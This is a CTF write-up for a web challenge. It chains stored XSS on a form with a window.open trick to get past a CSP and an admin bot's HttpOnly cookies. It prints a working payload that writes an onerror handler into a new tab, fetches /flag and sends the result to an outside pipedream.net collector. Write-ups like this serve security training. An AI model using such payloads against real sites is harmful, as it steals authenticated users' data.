we got an admin bot, and its cookies are ser to HttpOnly and SameSite=Lax so, we can't get the cookie with just document.cookies you will get an empty string. read more about this here​!

Website Overview

we have a home page with a form which is vulnerable to stored XSS.

Source code review

we can see a CSP policy is set.

we can go to csp-evaluator to check what's vulnerable.

How to Get Flag ?

we have a Flag route which only admin can access

so these were my leads during CTF I couldn't solve it so after CTF I checked a payload's first line I saw window.open so with that clue in mind I started this challenge again.

these are the things which we can do with that CSP

  • we can inject script for that page.

  • we can't access or fetch /flag route. we can only execute js in present page

  • we can control whole browser with window

with these in mind let's plan a payload

  • we can open another tab with /flag window.open()

  • we can execute code in that tab using it's assigned variable

  • so, when that /flag is loaded we have to inject something to make a post request to /flag and send that data to our servers.

tab.window.onload=()=>tab.window.document.write(`<img src=x onerror="fetch('/flag',{method:'POST'}).then(response=>response.text()).then(response => fetch('https://eoeq1wfgfu9ld15.m.pipedream.net/?flag='+btoa(response)))"></img>`)

after making submitting the crime to admin bot we will get the flag.


Homework not some homework exactly.

I want web team members to come up with other way to do this without using fetch.

Last updated